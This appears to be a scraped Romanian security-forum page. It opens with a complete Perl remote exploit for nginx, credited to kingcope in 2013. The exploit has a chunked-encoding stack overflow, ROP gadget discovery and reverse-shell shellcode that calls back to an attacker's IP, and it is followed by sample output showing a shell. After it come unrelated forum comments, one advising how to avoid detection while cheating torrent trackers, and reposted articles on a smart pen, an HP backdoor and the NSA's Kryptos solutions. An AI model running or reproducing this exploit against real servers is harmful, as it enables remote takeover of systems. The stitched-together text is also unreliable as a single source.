found 5184 Finding exact library addresses trying plt 0x08049a6a, got 0x080be08c, function 0xb75f74f0 % FOUND exact memset 0x08049a68 % trying plt 0x08049b8a, got 0x080be0d4, function 0xb764b160 % FOUND exact ioctl 0x08049b88 % trying plt 0x08049eea, got 0x080be1ac, function 0xb76501e0 % FOUND exact mmap64 0x08049ee8 % Found library offsets, determining mnemonics trying 0x0804ea7f % SURVIVED % exact large pop ret 0x0804a7fa exact pop x3 ret 0x0804a101 bin search done - See reverse handler for success Connection from 192.168.27.135 port 443 [tcp/https] accepted uname -a;id; Linux linux-01xg 3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup) cat /etc/SuSE-* openSUSE VERSION = 12.1 openSUSE 12.1 (i586) VERSION = 12.1 CODENAME = Asparagus =cut use IO::Socket; if ($#ARGV < 3) { print "nginx remote exploit\n"; print "copyright (c) 2013 kingcope\n"; print "usage: $0 <target> <target port> <reverse ip> <reverse port>\n"; exit; } $target = $ARGV[0]; $targetport = $ARGV[1]; $cbip = $ARGV[2]; $cbport = $ARGV[3]; #linux reverse shell by bighawk $lnxcbsc = "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x90\x90\x90\x6a\x66\x58\x6a\x01\x5b" ."\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x68" ."\x7f\x7f\x7f\x7f" # IP ."\x66\x68" . "\xb0\xef" # PORT ."\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x6a\x03\x5b\x6a\x66" ."\x58\xcd\x80\x87\xf3\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x31\xd2" ."\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip")); substr($lnxcbsc, 31, 4, $a1 . $a2 . $a3 . $a4); ($p1, $p2) = split(//, reverse(pack("s", $cbport))); $p1 = chr(ord($p1)); $p2 = chr(ord($p2)); substr($lnxcbsc, 37, 2, $p1 . $p2); $|=1; $uri=""; ###test target vulnerable #XXX #$k = 0x80498d0; #$align2 = 5200; #$alignplus=0; #goto debug; print "Testing if remote httpd is vulnerable "; $uritested = 0; test: goto l; connecterr: if ($j==0) { print "\nDestination host unreachable\n"; exit; } goto again; l: for ($j=0;$j<15;$j++) { again: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto connecterr}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: close\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); twinkle(); print $sock $req; send($sock, "A" x (5555-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); close($sock); twinkle(); if ($buffer =~ /HTTP\/1.1/) { next; } if ($l <= 0) { print "% SEGV %\n"; print "YES %\n"; goto yes; } } if ($uritested == 0) { $uri = "50x.html"; $uritested=1; goto test; } print "\n\\\\ NO %\n"; print "\\\\ Try to increase client MTU with ifconfig <interface> mtu 60000 up\n\n\\\\ Debug output\n"; $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto connecterr}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "GET / HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x (5555-1024) . $stack, MSG_OOB); $line = 0; while(<$sock>) { print; if ($line > 30) { last; } } exit; ###find align $verifyalign = 0; yes: print "Finding align distance (estimate)\n"; for ($align=4050;$align<6000;$align+=100) { for ($j=0;$j<15;$j++) { printf("testing %d align ",$align); again0_1: # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again0_1}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again0_1}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x ($align-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); twinkle(); close($sock); if ($l <= 0) { if ($align == 4050) { goto out; } print " % SEGV %\n"; $alignstart = $align-100; goto incalign; } print "\r\r\r\r"; if ($buffer =~ /HTTP\/1.1/) { next; } close($sock); } } out: print "\n\\\\ Align not found\n"; exit; incalign: for ($align=$alignstart;$align<6000;$align++) { for ($j=0;$j<7;$j++) { printf("testing %d align ",$align); again0_2: # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again0_2}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again0_2}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x ($align-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); twinkle(); close($sock); if ($l <= 0) { print " % SEGV %\n"; if ($verifyalign == 0) { print "Verifying align\n"; $verifyalign = $align; goto yes; } if (($align > $verifyalign + 4) || ($align < $verifyalign - 4)) { print "\\\\ Align and verfied align do not match\n"; exit; } if ($verifyalign < $align) { $align = $verifyalign; } goto begin; } print "\r\r\r\r"; if ($buffer =~ /HTTP\/1.1/) { next; } close($sock); } } print "\n\\\\ could not find align value. bailing out"; exit; ###find write offset begin: print "Finding write offset, determining exact align\n"; $align2 = $align; $ok = 0; #for ($k=0x8049d30;$k<=0x0804FFFF;$k+=4) { for ($k=0x08049800;$k<=0x0804FFFF;$k+=4) { #for ($k=0x0804dc00;$k<=0x0804FFFF;$k+=4) { for ($alignplus=0;$alignplus<7;$alignplus++) { debug: for ($j=0;$j<10;$j++) { if (pack("V", $k) =~ /\x20/) { next; } $align = $align2 + $alignplus; printf("testing 0x%08x, %d align ",$k,$align); again1: # if ($ok==0) { # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again1}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); # } $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again1}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; # $k = 0x8049e30; #XXX $stack = pack("V", $k) # write plt assumed,eg 0x804ab6c . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $k-0x1000) # write buffer . "\xff\xff\xf0\x00"; # write size #$p = <stdin>; print $sock $req; if ($ok == 0) { send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); } else { send($sock, "A" x ($align-1024) . $stack . "A" x 500, MSG_OOB); } $l = read($sock, $buffer, 0x5000); twinkle(); close($sock); #0x8049c50 if ($buffer =~ /HTTP\/1.1/) { if ($ok == 0) { print "\r\r\r\r"; next; } else { goto again1; } } if ($ok == 1 && length($buffer) < 0x2000) { goto again1; } if (length($buffer) > 350) { if ($ok == 0) { $ok = 1; print " % SURVIVED %\n"; print("Extracting memory "); goto again1; } print "\nbin search done, "; printf("read %d bytes\n", $l); goto hit; } print "\r\r\r\r"; } } } print "\n\\\\unable to get write offset\n"; exit; hit: printf("exact align found %d\n", $align); print "Finding exact library addresses\n"; $write = $k; $writeless = $write-0x1000; ### find offsets for mmap64, memset and ioctl $mmap64 = ""; $ioctl = ""; $memset = ""; $mmap64_prefix = "\x55\x53\x56\x57\x8b\x54\x24\x28" ."\x8b\x4c\x24\x2c\xf7\xc2\xff\x0f" ."\x00\x00\x75"; $ioctl_prefix = "\x53\x8b\x54\x24\x10\x8b\x4c\x24" ."\x0c\x8b\x5c\x24\x08\xb8\x36\x00" ."\x00\x00"; $memset_prefix = "\x53\x8b\x4c\x24\x10\x0f\xb6\x44" ."\x24\x0c\x88\xc4\x89\xc2\xc1\xe0" ."\x10\x09\xd0\x8b\x54\x24\x08\x83"; $memset_prefix2 = "\xfc\x57\x8b\x54\x24\x08\x8b\x4c" ."\x24\x10\x0f\xb6\x44\x24\x0c\xe3" ."\x2c\x89\xd7\x83\xe2\x03\x74\x11"; $memset_prefix3 = "\x57\x8b\x7c\x24\x08\x8b\x54\x24" ."\x10\x8a\x44\x24\x0c\x88\xc4\x89" ."\xc1\xc1\xe0\x10\x66\x89\xc8\xfc"; $memset_prefix4 = "\x55\x89\xe5\x57\x56\x83\xec\x04". "\x8b\x75\x08\x0f\xb6\x55\x0c\x8b". "\x4d\x10\x89\xf7\x89\xd0\xfc\x83"; $buffer2 = $buffer; $buffer3 = $buffer; plt_again: $buffer2 = $buffer3; for( { $i = index($buffer2, "\xff\x25"); if ($i >= 0) { if (($j = index($buffer3, substr($buffer2, $i, 50))) <= 0) { $buffer2 = substr($buffer2, $i+2); next; } $buffer2 = substr($buffer2, $i+2); $address = $writeless + $j; ### delve into library function printf "trying plt 0x%08x, ", ($address+2); again2: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again2}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $address+2) # write buffer . "\x00\x03\x00\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); $l = read($sock, $buffer, 0x300); if ($buffer =~ /HTTP\/1.1/) { goto again2; } if ($l == 0x300) { $gotentry = unpack("V", substr($buffer,0,4)); if ($gotentry == 0) { print "\r\r\r\r"; next; } close($sock); } else { close($sock); goto again2; } printf "got 0x%08x, ", $gotentry; again3: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again3}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $gotentry) # write buffer . "\x00\x03\x00\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); $l = read($sock, $buffer, 0x300); close($sock); if ($buffer =~ /HTTP\/1.1/) { goto again3; } if ($l == 0x300) { $function = unpack("V", substr($buffer,0,4)); } else { goto again3; } if ($function == 0) { print "\r\r\r\r"; next; } printf "function 0x%08x ", $function; again4: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again4}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $function) # write buffer . "\xff\xff\xf0\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); #$p = <stdin>; $l = read($sock, $buffer, 0x500); close($sock); if ($buffer =~ /HTTP\/1.1/) { goto again4; } if ($l != 0x500) { goto again4; } ### if (substr($buffer, 0, length($mmap64_prefix)) eq $mmap64_prefix) { $mmap64 = $address; printf(" %% FOUND exact mmap64 0x%08x %%\n", $mmap64); } if ((substr($buffer, 0, length($memset_prefix)) eq $memset_prefix) or (substr($buffer, 0, length($memset_prefix2)) eq $memset_prefix2) or (substr($buffer, 0, length($memset_prefix3)) eq $memset_prefix3) or (substr($buffer, 0, length($memset_prefix4)) eq $memset_prefix4)) { $memset = $address; printf(" %% FOUND exact memset 0x%08x %%\n", $memset); } if (substr($buffer, 0, length($ioctl_prefix)) eq $ioctl_prefix) { $ioctl = $address; printf(" %% FOUND exact ioctl 0x%08x %%\n", $ioctl); } if (($mmap64 ne "") and ($memset ne "") and ($ioctl ne "")) { goto gotplt; } print "\r\r\r\r"; } else { last; } } print "\nFinding exact library addresses\n"; goto plt_again; gotplt: print "Found library offsets, determining mnemonics\n"; ### find pop pop pop ret ### to set socket blocking for ($k=$write + 0x5000;;$k++) { printf("trying 0x%08x ",$k); again5: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again5}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $ioctl) . pack("V", $k) # pop pop pop ret assumed . "\x03\x00\x00\x00" . "\x21\x54\x00\x00" . "\x08\x80\x04\x08" # null byte . pack("V", $write) # write plt found . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $write) # write buffer . "\xff\xff\x0f\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); #$p = <stdin>; $l = read($sock, $buffer, 0xfffff); close($sock); twinkle(); if ($buffer =~ /HTTP\/1.1/) { again5; } if ($l > 0xfff) { print " % SURVIVED %\n"; close($sock); goto hit2; } print "\r\r\r\r"; next; } hit2: ###send attack buffer ###find largepopret @matches = $buffer =~ /(\x83\xc4\x20[\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d]\xc3)/g; foreach $m (@matches) { $i = index($buffer, $m); twinkle(); print "\r"; if ($i >= 0) { $__largepopret = $write + $i; printf("exact large pop ret 0x%08x\n", $__largepopret); goto hit3; } } print "\\\\ large pop ret not found\n"; exit; hit3: ###find poppoppopret @matches = $buffer =~ /([\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d]\xc3)/g; foreach $m (@matches) { $i = index($buffer, $m); if ($i >= 0) { $__poppoppopret = $write + $i; printf("exact pop x3 ret 0x%08x\n", $__poppoppopret); goto attack; } } print "\\\\ poppoppopret not found\n"; exit; attack: $largepopret = pack("V", $__largepopret); $popblock = "\x00\x00\x00\x00" ."\x00\x00\x00\x00" ."\x00\x00\x00\x00" ."\x00\x00\x00\x00"; $popret = pack("V", $__poppoppopret+2); $poppoppopret = pack("V", $__poppoppopret); $pop3ret = $__poppoppopret; $copycode = "\xfc\x8b\xf4\xbf\x00\x01\x00\x10\xb9\x00\x02\x00\x00\xf3\xa4" ."\xeb\xff"; $memsetcode = ""; $copyaddress = 0x10000000; for ($i=0;$i<length($copycode);$i++) { $byte = substr($copycode, $i, 1); $memsetcode .= pack("V", $memset) . pack("V", $pop3ret) . pack("V", $copyaddress) . $byte . "\x00\x00\x00" . "\x01\x00\x00\x00"; $copyaddress++; } for ($q=0;$q<10;$q++) { print "bin search done "; sleep(1); twinkle(); print "\r" } print "\n"; print "See reverse handler for success\n"; again6: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again6}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: close\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $mmap64) . $largepopret ."\x00\x00\x00\x10" # mmap start ."\x00\x10\x00\x00" # mmap size ."\x07\x00\x00\x00" # mmap prot ."\x32\x00\x00\x00" # mmap flags ."\xff\xff\xff\xff" # mmap fd ."\x00\x00\x00\x00" # mmap offset ."\x00\x00\x00\x00" # mmap offset . $popblock . $memsetcode . "\x00\x00\x00\x10" # JUMP TO 0x10000000 (rwxp addr) . "\x90" x 100 . $lnxcbsc; #$p = <stdin>; print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); close($sock); goto again6; # XXX my $current = 0; sub twinkle { $cursors[0] = "|"; $cursors[1] = "/"; $cursors[2] = "-"; $cursors[3] = "\\"; print "$cursors[$current++]\b"; if ($current > 3) { $current = 0; } }

Pentru site-urile externe nu e rau.Il lasi o zi si o noapte si ai 100 de GB garantat.

Da , l-am folosit eu mai demult . Nu l-am folosit pe FILELIST ca nu am nevoie ci pe trackerele externe gen IPT , Speed.Cd . Atentie totusi , puneti-va viteze mici de upload gen 1,2 mb / s pentru ca va prinde.

A mai fost postata o data aici : https://rstforums.com/forum/71020-fostul-director-de-securitate-al-facebook-devenit-spion-digital-pentru-nsa.rst

Asta e o "stire" care merita postata la Cosul de Gunoi.Probabil acel site a fost "spart" de catre un grup de copii si au lasat si ei " Hacked by xxx " . Penibil oricum gestul.

Aceeasi reactie am avut-o si eu cand am citit stirea.De fapt inca ma amuz

Lernstift — German for “learning pen” — is a Linux-based smart pen that will notify users when they make mistakes. Photo: Lernstift What if your pen could warn you about spelling mistakes, just like your word processor? Lernstift — German for “learning pen” — is a Linux-based smart pen that not only corrects spelling, but can also help students, or anyone else, improve their handwriting. There are other smart pens on the market, such as the Livescribe, but Lernstift is unusual in that doesn’t require special paper and will have exchangeable pen tips — including a fountain pen module, a ballpoint module, and, eventually, a pencil module. The gadget is now available for pre-order through Kickstarter and is expected to ship in December. But why worry about enhancing handwriting on paper just when society seems to be abandoning that skill in favor of typing, or at least using digital styluses? Lernstift inventor Falk Wolsky explains that the idea was born out of frustration with his oldest son’s homework mistakes. Wolsky says his son was too often distracted, and would make small, preventable errors. “My wife said: ‘I wish the pen would give him an electroshock or something to make him think about his spelling,’” Wolsky says. “I thought, an electroshock wasn’t so good, but a vibration might work.” Wolsky doubts old fashioned handwriting will ever go away, citing research on its cognitive benefits. For example, one study by researchers at Indiana University found that students who wrote letters and other symbols by hand could better identify those shapes later than those who just studied them without writing them. Lernstift works by monitoring what a user is writing using built in sensors. It can then send data wirelessly to a computer or tablet that can analyze what’s being written and then tell the pen to vibrate if the user draws a letter too sloppily, or if they misspell a word. “They get instant feedback, instead of feedback three days later when the teacher hands the paper back covered in red marks,” Wolsky says. The pen uses a custom embedded Linux operating system with custom, closed-source software that controls the sensors and handles handwriting recognition. But Lernstift will have an open API so that developers can build new applications for the pen, whether that’s new dictionaries to support spell checking in different languages, or ways to use the pen to transfer drawings to Photoshop. “The developer platform is extremely important part for us,” he says. Lernstift is yet another example of how “the internet of things” can turn household items like pens into programmable “smart objects.” Even something as old fashioned as handwriting can be given new dimensions. Sursa Wired.Com Parerea mea : Aceasta inventie este una geniala ; Asta ar fi un element surpriza sa le dai copiilor de 6-16 ani , in general copiilor romani sa invete sa scrie , iar la fiecare greseala sa fie atentionati sau cum a zis nevasta celui de mai sus : " sa le dea un electrosoc " ( just kiddin' )

Hewlett-Packard has agreed that there is an undocumented administrative account in its StoreVirtual products, and is promising a patch by 17 July. The issue, which seems to have existed since 2009, was brought to the attention of The Register by Technion, the blogger who earlier published an undocumented backdoor in the company's StoreOnce products. Since then, some HP users have confirmed the backdoors in e-mail to The Register, providing evidence of the account names and passwords that allow access to the devices. The Reg can report those credentials would not pass complexity tests required by many websites as they use no numerals, symbols or capital letters. HP has now issued this security advisory, stating : The company states that “Root access to the LeftHand OS does not provide access to the user data being stored on the system”. Although data isn't accessible via the backdoor, one user with around 50 TB of StoreVirtual capacity said the account gave sufficient access to reboot nodes in a cluster, “and so cripple the cluster”. “It lets you browse to "SMH » Security » Trusted Management Servers" though, ("Certificates are used to establish the trust relationship between Systems Insight Manager or Insight Manager 7 and the System Management Homepage.") You can use that to import a certificate to trust another Systems Insight Manager box,” said that user, who asked not to be identified. And, of course, there's the "reset factory defaults" option, which would nuke all a user's data. ® Sursa TheRegister.co.uk

It took more than eight years for a CIA analyst and a California computer scientist to crack three of the four coded messages on the CIA’s famed Kryptos sculpture in the late ’90s. Little did either of them know that a small group of cryptanalysts inside the NSA had beat them to it, and deciphered the same three sections of Kryptos years earlier — and they did it in less than a month, according to new documents obtained from the NSA. These days the NSA is best known for its broad, indiscriminate spying on Americans and foreigners. But the Kryptos crack shows how some of the agency’s smartest geeks once blew off steam in the relatively quiet days between the end of the Cold War and the September 11 attacks. The popular story of Kryptos has long held that CIA analyst David Stein was the first to crack three of the cryptographic sculpture’s four puzzles in 1998. Stein decrypted the coded messages after spending some 400 hours’ worth of lunch hours working through the puzzles using only paper and pencil. Many people, on and off the CIA campus in Langley, Virginia, had tried to break the coded puzzle, but only Stein, a member of the agency’s Directorate of Intelligence, succeeded. Stein’s work on the code was kept secret, however. In 1999, he wrote a fascinating account of how he cracked three of the sculpture’s four coded messages, but it was only published in an internal CIA newsletter that remained classified until years later. The secrecy over Stein’s achievement allowed California computer scientist Jim Gillogly to steal the spotlight a year later in 1999, when he announced that he’d also cracked the same three messages, only he used a Pentium II to do it. But new documents released by the National Security Agency show how the Defense Department’s spy agency beat Stein and Gillogly to the punch years earlier. An internal NSA memo discussing the agency’s success at cracking three of the sculpture’s four puzzles. Courtesy of Elonka Dunin It’s a story that has largely remained buried in the NSA archives until Elonka Dunin unearthed it in a recent FOIA request. Dunin is the premier expert on Kryptos who oversees a Yahoo Group dedicated to cracking the code and also maintains a website dedicated to the sculpture. Although a Baltimore Sun story about Kryptos in 2000 disclosed that the NSA had cracked three sections of the puzzle, many of the details behind the efforts were not revealed. It all began in 1988 when the CIA Fine Arts Commission commissioned local artist James Sanborn to create a cryptographic sculpture for a courtyard on the CIA campus. Sanborn completed the two-part sculpture in 1990, which included stones laid out in International Morse code near the front entrance of the CIA campus, and a 12-foot-high, verdigrised copper, granite and petrified wood sculpture. The latter, which is the more famous part of Kryptos, was inscribed with four encrypted messages composed from some 1,800 letters carved out of the copper plate. One of the memos notes that the layout of the two-part sculpture was “a landscaping scheme designed to recall the natural stone out-cropping that existed on the site before the Agency, and that will endure as do mountains.” The placement of the sculpture “in a geologic context reinforces the text’s ‘hidden-ness’ as if it were a fossil or an image frozen in time.” In 1991, while on a trip to the CIA, a group of NSA cryptanalysis “interns” diligently scribbled all the letters from the sculpture onto sheets of paper and brought them back to the NSA so curious analysts there could take a crack at it. In December 1991 a group of NSA analysts met in a conference room at the NSA to discuss the sculpture and what methods of decryption they might apply, including classified methods used internally by the NSA. A memo about this meeting indicates that “any discussion of ‘in-house’ techniques or applications (being classified) are not mentioned in this text as it is to be unclassified.” The memo also included a note to participants not to discuss their efforts to crack the puzzle in public, as some of the methods they used might be classified, as well as a message at the bottom of the memo indicating that “these notes were prepared at NO expense to the US Government.” After that initial NSA meeting, however, nothing further was done on the puzzle. Over the next year, the CIA tried to crack the sculpture on its own, but with no success. The sculpture remained unsolved until 1992, when Adm. William O. Studeman, the CIA’s then-deputy director and a former NSA director, issued a formal challenge to his former colleagues at the NSA to solve the CIA’s new courtyard puzzle. The NSA’s director at the time, Vice Admiral Mike McConnell, announced the challenge during an internal ceremony at the NSA, and a small cadre of cryptanalysts from the agency’s Z Group — the internal name for the cryptanalysts division — “enthusiastically responded.” Left on their own, NSA employees had shown little passion for cracking the ciphers, but once a formal challenge was on the table from the CIA, it was hard to resist. The group was so intent on cracking the code that they formed an informal task force in November 1992, according to the recently released documents, which include a number of internal NSA memos describing how they cracked the ciphers. Working from the transcription obtained by interns a year earlier, they quickly determined, using computer diagnostic tools, that the sculpture consisted of four parts — using at least three different ciphers — and a cryptographic table based on an encryption method developed in the 16th century by a Frenchman named Blaise de Vigenere that was key to helping them solve parts of the puzzle. They were sure to note that subsequent analysis and solutions of the code “did not require any computer power” but were done by hand. They quickly discovered that the encrypted sections included intentional spelling errors made by artist James Sanborn, and misaligned characters set higher on a line of text than characters around them. Then “within two days of receiving the information tasking from Chief, Z,” they had solved parts one through three of the puzzle. They spent another day on the fourth section, but very quickly “a decision was made to stop any further work” on it. “Given the suspected cryptography, the last section is too short to solve without diverting a great deal of effort from operational problems,” they wrote in the memo. In the end, it was just three analysts who solved the codes, one tackling each section of the puzzle. Although the names are redacted in the documents released by the NSA, Dennis McDaniels was identified as one of the crackers in the Baltimore Sun article. Ken Miller was also identified as another member of the group, though someone knowledgeable about the project told Wired that he didn’t decipher any of the sections but worked closely with the group to write up their notes. In June 1993, after the three parts were cracked, an internal letter announcing the feat was sent to Admiral McConnell at the NSA, marked “For Official Use Only” and informing him that the deed was done. It was returned with a request to forward the note to Admiral Studeman at the CIA, no doubt with an air of glee and arrogance that the NSA had beat the CIA at cracking its own puzzle. Another scribbled note on the memo read, “Great Story!” The documents describe their efforts through “many wrong turns” to arrive at the solutions. The first part of the sculpture used a periodic polyalphabetic substitution cipher using 10 alphabets, and when decrypted was a poetic phrase that Sanborn had composed himself: “Between subtle shading and the absence of light lies the nuance of iqlusion” (“iqlusion” was an intentional misspelling of illusion). Part two used a periodic polyalphabetic substitution cipher using 8 alphabets. When decrypted, the passage hinted at something buried: It was totally invisible. How’s that possible? They used the Earth’s magnetic field. x The information was gathered and transmitted underground to an unknown location. x Does Langley know about this? They should: It’s buried out there somewhere. x Who knows the exact location? Only WW. This was his last message. x Thirty-eight degrees fifty-seven minutes six point five seconds north, seventy-seven degrees eight minutes forty-four seconds west. ID by rows. The cryptanalysts correctly guessed that WW referred to William Webster, which Wired confirmed in 2005 during an interview with artist Sanborn. “The coordinates,” the memo noted, “refer to the location of or a location within the Central Intelligence Agency.” But the significance of the I.D. by Rows? That remained “undetermined,” the NSA’s puzzle crackers wrote. In fact, Sanborn had made an error in the puzzle and inadvertently introduced a typo in the section. The mistake involved an “x” that he intentionally deleted from the end of a line in section two for aesthetic reasons, to keep the sculpture visually balanced. The “x” was supposed to signify a period or section break at the end of a phrase, but Sanborn removed it thinking it wouldn’t affect the way the puzzle was deciphered. It turned out the “x” made all the difference, however. Instead of “ID by rows” it actually should have been deciphered to read “layer two,” though code breakers wouldn’t discover this until years after the NSA cryptanalysts had their crack at the code. Part three used a keyed columnar transposition cipher, which the cryptanalysts partly diagnosed solely by “eyeballing” the text. “The most likely explanation for this is a transposition system,” they write, “perhaps a keyed columnar transposition. In such a system, the plain text is inscribed horizontally into a matrix, normally a rectangle, and then the latter are extracted vertically, according to a pre-determined sequence.” When decrypted, it was a paraphrased page taken from the diary of archaeologist Howard Carter describing the opening of a door in King Tut’s tomb on Nov. 26, 1922. Slowly, desperately slowly, the remains of passage debris that encumbered the lower part of the doorway was removed. With trembling hands I made a tiny breach in the upper left-hand corner. And then, widening the hole a little, I inserted the candle and peered in. The hot air escaping from the chamber caused the flame to flicker, but presently details of the room within emerged from the mist. x Can you see anything? q According to a former Defense Department cryptanalyst who spoke with Wired, McDaniels was responsible for cracking section three and did it in just six hours lying on his living room couch with paper and pencil after coming home exhausted one day from playing volleyball. McDaniels is now retired from the NSA and declined to speak with Wired about his work on the sculpture. But the source told Wired that McDaniels had been out all day playing volleyball and came home around 10pm. “He plopped down on the couch in the living room, picked up his draft notes for K3,” the source said. “He had tinkered with it before but could never get into it. He knew it was just basic transposition, so he started with the letter Q and [the letter U after it] and found there were five instances of the letter U, and he just tried all five of those. Then he had to try every other vowel that came after and he finally found something that broke it. By then it was about 4am and he was done.” Unfortunately the fourth section stymied the NSA code breakers, as it has continued to do other cryptanalysts for 23 years. The documents noted that “although ideas abound” for deciphering it, the final 97 characters of the sculpture “continue to elude solution.” OBKR UOXOGHULBSOLIFBBWFLRVQQPRNGKSSO TWTQSJQSSEKZZWATJKLUDIAWINFBNYP VTTMZFPKWGDKZXTJCDIGKUHUAUEKCAR They speculated that this section might employ a combination of the techniques used in other sections. “First the message is encrypted using some set of alphabets,” they write, “as was done in the first and third breakthroughs, and then the cipher is put through a transposition, such as that used in the second breakthrough.” But even with that they were never able to solve it. In 2010, Sanborn, surprised that the final section had remained 